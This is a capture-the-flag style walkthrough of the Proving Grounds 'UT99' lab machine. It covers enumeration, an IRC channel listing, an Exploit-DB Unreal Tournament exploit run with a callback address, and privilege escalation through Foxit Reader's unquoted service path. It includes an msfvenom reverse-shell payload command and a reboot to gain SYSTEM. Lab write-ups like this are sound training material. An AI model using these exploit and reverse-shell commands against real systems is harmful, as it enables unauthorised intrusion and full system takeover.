> For the complete documentation index, see [llms.txt](https://infintesky.gitbook.io/pentesting/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://infintesky.gitbook.io/pentesting/proving-grounds/get-to-work/windows/ut99.md).

# UT99

## Information Gathering

`sudo ./nmapAutomator.sh 192.168.175.44 all`

![](/files/wDg7wWr9HmPEGs8Y2HKy)

&#x20;We also have IRC open ports at range 6660 to 7000 and 7007.

### Service Enumeration

### FTP (Port 21)

![](/files/Y7vjAC9mg797WXhYK6D2)

We tried various standard login credentials but all did not work.

### HTTP (Port 80)

![](/files/dh7x2HlcavcJbOmSgfsy)

Looks like this is running Dragonfly CMS. Manual enumeration led us to conclude this is a dead end.

### IRC Ports (6660-7000 and 7007)

We can install `HexChat IRC Client` using the following command:

`apt-get install hexchat -y`

![](/files/WeAYiqWAMuBFB1ew0XZa)

We can add a new network and name it however we want. Next, click on the `Edit` to edit the parameters.

![](/files/f2jBGLWFKa4KhYBmGmaQ)

Here, add the IP and port number and click close.

![](/files/glgMkX50y7SLWJmaznps)

Then, we can use any name we want and click connect.

![](/files/kNunYc9eMPGmw7K2ZY7B)

Here, we click on the server option and click on ChannelList.

![](/files/kqtnwECkZcCckL8580nU)

Under ChannelList, we can search for channels with users from 1-9999. And we see the channel ut99.

![](/files/mxsnaHQ6lcgUQN7VWmeo)

Upon connecting, we see that the Unreal Tournament 99 Game server is hosted on port 7778.

## Exploit

{% embed url="<https://www.exploit-db.com/exploits/16145>" %}

`perl 16145.pl 192.168.175.44 7778 192.168.49.175 80`

![](/files/mTs7nJU8yJyVxic0jlH4)

## Privesc

`Systeminfo`

![](/files/q8DEHiqyw3TZ6rJecUNj)

We manually enumerate and find `ftp` directory.

![](/files/rpx4Qv95iojhKOabuZsw)

{% embed url="<https://www.exploit-db.com/exploits/36390>" %}

Looks like this version of Foxit Reader is vulnerable to unquoted service path privesc. We can check if it is installed.

![](/files/35Ad0Bfxx1KHtgOIRThJ)

![](/files/Gr89e4KA3Qr6Nx66Jax5)

![](/files/hYtr4kOIrqg1CThUWXwt)

Looks like we have write permissions.

![](/files/C3GewHfrkKA7xpr8Jidd)

So let's generate our payload names Foxit.exe.

`msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.175 LPORT=80 -f exe -o Foxit.exe`

Then, we transfer our file to the target machine.

![](/files/uY09P229RiAucunBTwlA)

![](/files/WuTBXQKkTvYk5jj6KZxp)

Next, we can reboot the machine. And we get SYSTEM.

`shutdown -r -t 5 && exit`

![](/files/S0qhnYBZ4vB5Ad6dYBaV)
